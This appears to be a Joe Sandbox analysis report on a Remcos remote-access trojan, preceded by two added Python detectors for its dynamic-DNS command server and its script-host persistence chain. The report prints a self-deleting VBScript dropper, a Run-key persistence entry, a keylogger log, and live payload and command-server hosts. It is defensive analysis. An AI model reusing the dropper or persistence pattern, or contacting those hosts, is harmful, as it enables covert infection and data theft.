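The network picture above splits into two stages that deserve separate detections: the payload is fetched over plain HTTP from a compromised-looking site (ztechinternational.com, AS46606), and the Remcos C2 is a 40-character random label under the free dynamic-DNS provider ydns.eu, reached on port 2024. The detector below is an added example, not part of the Joe Sandbox report or of Remcos. It scores dynamic-DNS names by label length and Shannon entropy and then correlates a follow-up connection on a non-web port with the address that name resolved to. The C2 name, its address and the port are taken from the report; the other provider suffixes, the thresholds, the client address and the benign control records are the example's own assumptions.

```python
import math
from collections import Counter
from typing import Dict, List, Tuple

# Suffixes of free dynamic-DNS providers. ydns.eu is the one the C2 host in this
# report uses; the others are assumptions a real deployment would tune.
DYNDNS_SUFFIXES = ("ydns.eu", "duckdns.org", "no-ip.org", "ddns.net", "hopto.org")
MIN_LABEL_LEN = 16   # assumption: labels shorter than this are not scored
MIN_ENTROPY = 3.5    # assumption: bits per character; human-chosen labels sit well below
EXPECTED_PORTS = {80, 443}

# Constructed log records (not from the report): DNS answers and connection flows
# seen for one client. Only the ydns.eu name, 172.94.125.152 and port 2024 come
# from this analysis; the client address and the control records are invented.
DNS_LOG: List[Tuple[str, str, str, str]] = [
    ("20:43:20", "192.168.2.22", "ztechinternational.com", "192.185.113.219"),
    ("20:43:50", "192.168.2.22", "hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu", "172.94.125.152"),
    ("20:44:01", "192.168.2.22", "update.home-nas.ydns.eu", "203.0.113.5"),
]
FLOWS: List[Tuple[str, str, str, int]] = [
    ("20:43:21", "192.168.2.22", "192.185.113.219", 80),
    ("20:43:51", "192.168.2.22", "172.94.125.152", 2024),
    ("20:44:02", "192.168.2.22", "203.0.113.5", 443),
]


def shannon_entropy(s: str) -> float:
    """Bits per character of s (0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def dyndns_label(qname: str):
    """(label, provider suffix) for a name under a watched dynamic-DNS suffix, else None."""
    q = qname.lower().rstrip(".")
    for suffix in DYNDNS_SUFFIXES:
        if q.endswith("." + suffix):
            # the label the customer registered sits directly under the provider suffix
            return q[: -len(suffix) - 1].split(".")[-1], suffix
    return None


def suspicious_dyndns(qname: str) -> bool:
    """Long, high-entropy label directly under a dynamic-DNS provider."""
    hit = dyndns_label(qname)
    if hit is None:
        return False
    label, _ = hit
    return len(label) >= MIN_LABEL_LEN and shannon_entropy(label) >= MIN_ENTROPY


def detect(dns_log, flows) -> List[Dict[str, str]]:
    alerts: List[Dict[str, str]] = []
    resolved: Dict[str, str] = {}   # answer IP -> suspicious name it came from
    for ts, client, qname, answer in dns_log:
        if suspicious_dyndns(qname):
            resolved[answer] = qname
            alerts.append({"ts": ts, "client": client,
                           "rule": "dyndns-random-label", "indicator": qname})
    for ts, src, dst, port in flows:
        # A follow-up connection to that address on a non-web port is the beacon itself.
        if dst in resolved and port not in EXPECTED_PORTS:
            alerts.append({"ts": ts, "client": src, "rule": "c2-beacon-candidate",
                           "indicator": f"{resolved[dst]}:{port}"})
    return alerts


if __name__ == "__main__":
    for alert in detect(DNS_LOG, FLOWS):
        print(alert)
```

Keying the alert on the hostname rather than the address is deliberate: the Joe Sandbox View / Context section further down shows the same ydns.eu name resolving to several different addresses in earlier analyses, so the IP is a short-lived indicator and the name is the durable one. The payload site is not scored here because a legitimate-looking domain with an ordinary label gives this heuristic nothing to work with; that stage is better caught by the .bin download and the wscript chain on the host.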

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:430707
                Start date:07.06.2021
                Start time:20:41:45
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 10m 41s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664 (renamed file extension from 17664 to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:27
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal96.troj.evad.winEXE@19/10@9/3
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 3.5% (good quality ratio 0.6%)
                • Quality average: 11.4%
                • Quality standard deviation: 27.1%
                HCA Information:
                • Successful, ratio: 70%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Override analysis time to 240s for sample files taking high CPU consumption
                Warnings:
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 168.61.161.212, 13.64.90.137, 13.88.21.125, 104.42.151.234, 20.82.210.154, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 23.57.80.111
                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/430707/sample/SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

                Simulations

                Behavior and APIs

Time | Type | Description
20:43:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
20:43:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
20:45:08 | API Interceptor | 775x Sleep call for process: win.exe modified
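The Autostart entries above and the "Process created" entries in the evasion section describe one host-side chain: the sample spawns itself, runs install.vbs from the user's Temp directory through wscript.exe, which uses cmd.exe /c to start win.exe from AppData\Roaming, and that copy re-launches itself and writes a Run value named win pointing back at itself. The detector below is an added example, not part of the Joe Sandbox report and not the Sigma rule the report's "WScript or CScript Dropper" signature refers to. It runs four rules over constructed events modelled on Sysmon process-creation and registry-value-set fields; the paths and command lines reproduce what this analysis observed, while the rule names, the regular expressions and the benign control event are the example's own.

```python
import re
from typing import Dict, List

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# A script under the user's Temp directory, as in '...\AppData\Local\Temp\install.vbs'
TEMP_SCRIPT_RE = re.compile(r"\\appdata\\local\\temp\\[^\s'\"]+\.(vbs|vbe|js|jse|wsf|wsh)\b")
# An executable under AppData\Roaming, as in '...\AppData\Roaming\win.exe'
ROAMING_EXE_RE = re.compile(r"\\appdata\\roaming\\[^\s'\"]+\.exe\b")
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\")

# Constructed events (not from the report) modelled on Sysmon process-creation
# (event 1) and registry value-set (event 13) fields. They replay the process
# chain and the Run-key write this analysis observed, plus one benign control.
SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe"
WIN = r"C:\Users\user\AppData\Roaming\win.exe"
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "Image": SAMPLE, "ParentImage": SAMPLE, "CommandLine": f"'{SAMPLE}'"},
    {"type": "process", "Image": r"C:\Windows\SysWOW64\wscript.exe", "ParentImage": SAMPLE,
     "CommandLine": r"'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'"},
    {"type": "process", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": f"'C:\\Windows\\System32\\cmd.exe' /c '{WIN}'"},
    {"type": "process", "Image": WIN, "ParentImage": r"C:\Windows\SysWOW64\cmd.exe", "CommandLine": WIN},
    {"type": "process", "Image": WIN, "ParentImage": WIN, "CommandLine": f"'{WIN}'"},
    {"type": "registry", "Image": WIN,
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\win", "Details": f'"{WIN}"'},
    {"type": "process", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c dir"},
]


def _base(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def process_rules(ev: Dict[str, str]) -> List[str]:
    image, parent, cmd = ev["Image"].lower(), ev["ParentImage"].lower(), ev["CommandLine"].lower()
    hits = []
    # wscript/cscript executing a script dropped under Temp
    if _base(image) in SCRIPT_HOSTS and TEMP_SCRIPT_RE.search(cmd):
        hits.append("script-host-runs-temp-script")
    # a script host's child (here cmd.exe /c) starting a binary under AppData\Roaming
    if _base(parent) in SCRIPT_HOSTS and ROAMING_EXE_RE.search(cmd):
        hits.append("script-host-launches-roaming-exe")
    # a user-path binary spawning an identical copy of itself (unpacking / injection staging)
    if image == parent and "\\users\\" in image:
        hits.append("self-reexecution-from-user-path")
    return hits


def registry_rules(ev: Dict[str, str]) -> List[str]:
    if RUN_KEY_RE.search(ev["TargetObject"].lower()) and ROAMING_EXE_RE.search(ev["Details"].lower()):
        return ["run-key-points-to-roaming-exe"]
    return []


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    alerts = []
    for ev in events:
        rules = process_rules(ev) if ev["type"] == "process" else registry_rules(ev)
        for rule in rules:
            alerts.append({"rule": rule, "image": ev["Image"],
                           "evidence": ev.get("CommandLine") or ev.get("Details", "")})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The self-re-execution rule is the noisiest of the four: browsers and updaters legitimately spawn copies of themselves, so in production it should be scoped to binaries under AppData, Temp and Desktop rather than all of C:\Users, or used only to raise the score of a host that has already tripped one of the other three. The Run-key rule is written against the HKCU path because both Autostart entries in this report write there; the HKCU64 variant is the same key seen through the 64-bit view.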

                Joe Sandbox View / Context

                IPs

Match | Associated Sample Name / URL | Detection | Context
192.185.113.219 | SecuriteInfo.com.__vbaHresultCheckObj.9138.exe | malicious | ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin
192.185.113.219 | MLJ.exe | malicious | ztechinternational.com/dk/Maily%20_remcos_poYYVI175.bin

                Domains

Match | Associated Sample Name / URL | Detection | Context
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | uFLbcEn9qq.xlsx | malicious | 172.94.125.184
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | b20e3f39_by_Libranalysis.exe | malicious | 172.94.125.102
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | f4b56009_by_Libranalysis.exe | malicious | 46.243.140.90
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | 49481a54_by_Libranalysis.exe | malicious | 46.243.140.90
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | INTRZGw3ev.exe | malicious | 46.243.140.66
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | LMKQB8tQQ2.exe | malicious | 10.4.78.10
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | SecuriteInfo.com.Generic.mg.80f76c27257e6f3e.exe | malicious | 172.94.37.30
ztechinternational.com | SecuriteInfo.com.__vbaHresultCheckObj.9138.exe | malicious | 192.185.113.219
ztechinternational.com | MLJ.exe | malicious | 192.185.113.219

                ASN


                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\c20d61befcda487dbc17044b70fd3bfd_1.~tmp
                Process:C:\Windows\System32\backgroundTaskHost.exe
                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):9472
                Entropy (8bit):5.648577726443805
                Encrypted:false
                SSDEEP:192:TMXLpAvK70mJtlHB5tHyIyo0HyIz2sEHyI+t:O5BrCaRA
                MD5:85D06071360BFD61E25CB454BC3D9A52
                SHA1:950C8BB32046385EC5924E742A0626F4FE33905C
                SHA-256:FF30FCDBC0BC021882B324869C6F642FEF4C5E2F4F1FF50265869459C4B4A0CE
                SHA-512:996E2DDD56A39119310235F30AF0B0E94F9598D2E1FCE417C90EA1DAA4D2CC61A38F1A38239EB4F9D6B18B0A7B8B94C1C0119A8C950E6D6548548CAFA0A48863
                Malicious:false
                Reputation:low
                Preview: {"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":619870,"height":1080,"sha256":"Sjoon1DPT2frxCE4x8+n/eInIBto1+Bqa2+yCIAGsnE=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\802718d3cf4e06d977a7ce89b9b5b059961bd30dd185cfc85d50f4b517d86888"},"portraitImage":{"fileSize":541306,"height":1920,"sha256":"5J1QvtZQvTAkpjdIGXZjpmwft0txV5oWHNifdjQq+SA=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\afece1b8b7bbd157a59a74a90e4894314c82accd9b3076dfe8ee636d610fcafb"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","
                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\d572bee68d954d8f906b98a2e017f820_1.~tmp
                Process:C:\Windows\System32\backgroundTaskHost.exe
                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):9626
                Entropy (8bit):5.620324379710843
                Encrypted:false
                SSDEEP:192:8Wo0fhWWozjAvKZph/DtlHB5WHyPWhuBHyerhOt9HyTYr:LfhJ0hVohuhkr
                MD5:B48D9564B458B043EA568C06C3E8DD00
                SHA1:317E35E4D15A036F1A5EB88BDB0467B3142AB1C9
                SHA-256:DEF2CBC831437E6C49048AF0A85E0FBD5E533C040309F92293A2554CADCFD03A
                SHA-512:BBA8D250145080CC6AAE568FB66E5346C7B5E5C366F36E74A039733CF64832294B1DFF9EBAE191375ED00AA3612ECDD2F206F6B105127735D0FA8210DC936460
                Malicious:false
                Reputation:low
                Preview: {"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":556406,"height":1080,"sha256":"CY3KzKVHdoTu7NbePjx+CQPZn53417ZCdtczfhQp7ag=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\c6f553ef401df1783242a6b5e23dca6ee2b1ba33f2a7e7f4d621fd5e77abb22b"},"portraitImage":{"fileSize":596086,"height":1920,"sha256":"/oiuOOD/NM0Qccsss/nuHFdUzMCaXUgbKXyyTwXRIpY=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\d496c712e078cb44236edd3e8ea0055ee21cb66c3c7ce5ec90fb916e48dea486"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","
                C:\Users\user\AppData\Local\Temp\install.vbs
                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                File Type:data
                Category:modified
                Size (bytes):404
                Entropy (8bit):3.476487137149483
                Encrypted:false
                SSDEEP:12:4D8o++ugypjBQMBvFQ4lOAMJnAGF0M/0aimi:4Dh+S0FNOj7F0Nait
                MD5:0AC72B36AE19DF5DD84381E07A64BA3B
                SHA1:194801CB7059E67ABF5A38E709D856A8095A71EE
                SHA-256:B17BD1B45A2144EAA120C3EE9BB97622B2A54B0D36A69B3750AF2678D359D14D
                SHA-512:DA76EC5A6C11DE83532AED125DF88B43BABD72774EC8A91C05697E4941F9C8DB2757402787C40EB08DFD82A0927A8A301F84FEE5EDE10D2DB56CC7B0BB429604
                Malicious:true
                Reputation:moderate, very likely benign file
                Preview (decoded from UTF-16):
                WScript.Sleep 1000
                Set fso = CreateObject("Scripting.FileSystemObject")
                CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\engineer\AppData\Roaming\win.exe""", 0
                fso.DeleteFile(Wscript.ScriptFullName)
                C:\Users\user\AppData\Roaming\logs.dat
                Process:C:\Users\user\AppData\Roaming\win.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):74
                Entropy (8bit):4.733300752387368
                Encrypted:false
                SSDEEP:3:ttUbV26rA4RXMRPHv31aeo:tmbXqdHv3IP
                MD5:4F44B12133FC55DA5016BABB674C756B
                SHA1:64B014DFF9B1A53ED1280E25D39977D007EB75B0
                SHA-256:E758FA16613EDE36575D3BC67FD9BCF8CF17AFF54003D45134CB3F5EBE6E100D
                SHA-512:38E69085470098AD5DCA565C10ADF731DB7854892D6FA4E117384B481345195B9021E2AA42FF98BB1903D84254A530F9CEBADA998D0C6380F2A0F38F617DC15C
                Malicious:false
                Reputation:low
                Preview: ..[2021/06/07 20:45:08 Offline Keylogger Started]....[ Program Manager ]..
                C:\Users\user\AppData\Roaming\win.exe
                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):110592
                Entropy (8bit):6.215185448028134
                Encrypted:false
                SSDEEP:3072:BCCFP2asIcR50gY4K+xWqEfGBpQ2JyB92mTZP9dsodxlxXuWcwZdZywBMxO8NJ:B3Bry+gY4DxWqEfGBpQ2JyB92mTZP9d0
                MD5:853744502B68E50E6CBAF81FFB3F5CC0
                SHA1:EA748BAEBE70D7C6D3DA9D1A2A34B76051425962
                SHA-256:8115607710C35C78EDA8DD16D73CAB92E2C857D8C91EB1422FCC1B3F06835A4A
                SHA-512:5B12B465E6F964F7280359546D42676A9A8B2C221568F4D4EE849F0E759E9DB59F5A43BF648E37C3878558142A1EB926331127606F78FC601DD8B69AC4D089F1
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 6%
                Reputation:low
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...0.>Z.....................0....................@..................................-......................................t...(...........................................................................(... ....................................text...8|.......................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\win.exe:Zone.Identifier
                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview: [ZoneTransfer]....ZoneId=0
                C:\Windows\Lwo7
                Process:C:\Users\user\AppData\Roaming\win.exe
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):56
                Entropy (8bit):3.521640636343319
                Encrypted:false
                SSDEEP:3:RRQRRQRRQRRQn:qQQS
                MD5:A0C9E601546791A2A273DEAC8256A3E5
                SHA1:4014E6DD93022436BEB51DFB32BDF995542C3942
                SHA-256:77F928BAFA7CCBF6071DD1DC877C30D5C9E1380F53F31A7283AE769B0C9BE20D
                SHA-512:7F19CBF8F2D17B6632E4CAB562F6936EB791D1738C93A83CC61E4470780B84DCBFDB4D935324474CC0665882A04EA64FABF25DA2405263C7A668FD1B42CFD4F7
                Malicious:false
                Preview: Chittamwood3..Chittamwood3..Chittamwood3..Chittamwood3..

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.215185448028134
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.15%
                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                File size:110592
                MD5:853744502b68e50e6cbaf81ffb3f5cc0
                SHA1:ea748baebe70d7c6d3da9d1a2a34b76051425962
                SHA256:8115607710c35c78eda8dd16d73cab92e2c857d8c91eb1422fcc1b3f06835a4a
                SHA512:5b12b465e6f964f7280359546d42676a9a8b2c221568f4d4ee849f0e759e9db59f5a43bf648e37c3878558142a1eb926331127606f78fc601dd8b69ac4d089f1
                SSDEEP:3072:BCCFP2asIcR50gY4K+xWqEfGBpQ2JyB92mTZP9dsodxlxXuWcwZdZywBMxO8NJ:B3Bry+gY4DxWqEfGBpQ2JyB92mTZP9d0
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...0.>Z.....................0....................@................

                File Icon

                Icon Hash:2828bae9d2777576

                Static PE Info

                General

                Entrypoint:0x4015d0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x5A3E9E30 [Sat Dec 23 18:19:28 2017 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:20511f60b3c62ae145d60c4c066b22a5

                Entrypoint Preview


                Data Directories

                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18574 | 0x28 | .text
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1b000 | 0x9c8 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 | -
                IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1d8 | .text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                Sections

                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x17c38 | 0x18000 | False | 0.469492594401 | data | 6.6051840279 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data | 0x19000 | 0x121c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc | 0x1b000 | 0x9c8 | 0x1000 | False | 0.227294921875 | data | 2.1041800969 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                Name | RVA | Size | Type | Language | Country
                RT_ICON | 0x1b6e0 | 0x2e8 | data | - | -
                RT_ICON | 0x1b4f8 | 0x1e8 | data | - | -
                RT_ICON | 0x1b3d0 | 0x128 | GLS_BINARY_LSB_FIRST | - | -
                RT_GROUP_ICON | 0x1b3a0 | 0x30 | data | - | -
                RT_VERSION | 0x1b150 | 0x250 | data | English | United States

                Imports

                DLL | Import
                MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaStrComp, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                Version Infos

                Description | Data
                Translation | 0x0409 0x04b0
                InternalName | Camases3
                FileVersion | 1.00
                CompanyName | MarbleStone
                Comments | MarbleStone
                ProductName | Panamansk8
                ProductVersion | 1.00
                OriginalFilename | Camases3.exe

                Possible Origin

                Language of compilation system | Country where language is spoken
                English | United States

                Network Behavior

                Network Port Distribution

                TCP Packets


                UDP Packets


                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Jun 7, 2021 20:43:35.098205090 CEST | 192.168.2.6 | 8.8.8.8 | 0x5409 | Standard query (0) | ztechinternational.com | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:07.588278055 CEST | 192.168.2.6 | 8.8.8.8 | 0x9bee | Standard query (0) | ztechinternational.com | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:07.818758011 CEST | 192.168.2.6 | 8.8.8.8 | 0xb3e7 | Standard query (0) | ztechinternational.com | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:09.373864889 CEST | 192.168.2.6 | 8.8.8.8 | 0xda30 | Standard query (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:19.333503008 CEST | 192.168.2.6 | 8.8.8.8 | 0xb1ba | Standard query (0) | ztechinternational.com | A (IP address) | IN (0x0001)
